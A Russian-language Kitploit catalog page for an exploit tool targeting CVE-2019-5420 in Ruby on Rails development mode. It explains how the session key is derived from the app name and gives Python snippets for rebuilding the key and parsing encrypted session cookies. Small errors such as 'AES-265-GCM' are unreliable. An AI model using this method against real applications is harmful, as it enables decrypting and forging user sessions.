Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/j4k0m/cve-2019-5420
Инструменты шифрования/дешифрованияАтаки на ПаролиАнализ уязвимостейЭксплуатация веб-приложенийТестирование на Проникновение
GitHubj4k0m/cve-2019-5420

CVE-2019-5420

Уязвимость может позволить злоумышленнику угадать автоматически сгенерированный секретный токен режима разработки.

Репозиторий
54 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-5420

Уязвимость может позволить злоумышленнику угадать автоматически сгенерированный секретный токен режима разработки.

Ruby-on-Rails при работе в режиме разработки. В режиме разработки злоумышленник может угадать ключ, используемый для защиты сессий.

Расшифровка:

Генерация ключа:

Rails использует 3 окружения (development, test, production), когда приложение работает в режиме разработки, вы можете угадать секретный токен и расшифровать зашифрованную сессию.

Ключ, используемый для защиты сессии, выводится из имени приложения.

Пример:

root@kitploit:~
rails new Jakom

Jakom: Имя приложения.

Таким образом, мы можем предположить, что ключ является результатом метода генерации:

root@kitploit:~
PKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]

Как мы видим здесь:

root@kitploit:~
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)

Расшифровка сессии с помощью ключа:

В Rails сессии шифруются с помощью AES-265-GCM, если у вас есть ключ, вы можете расшифровывать/шифровать сессии.

Последнее, что вам понадобится, это формат сессии:

root@kitploit:~
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]

Пример расшифровки:

Как мы видим здесь:

root@kitploit:~
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")

Первая часть куки сессии — это зашифрованные данные, вторая часть — IV, третья часть — GCM-тег (тег аутентификации). Обладая этой информацией, мы можем расшифровать наши сессии напрямую: image

Пример:

image

Скачать инструмент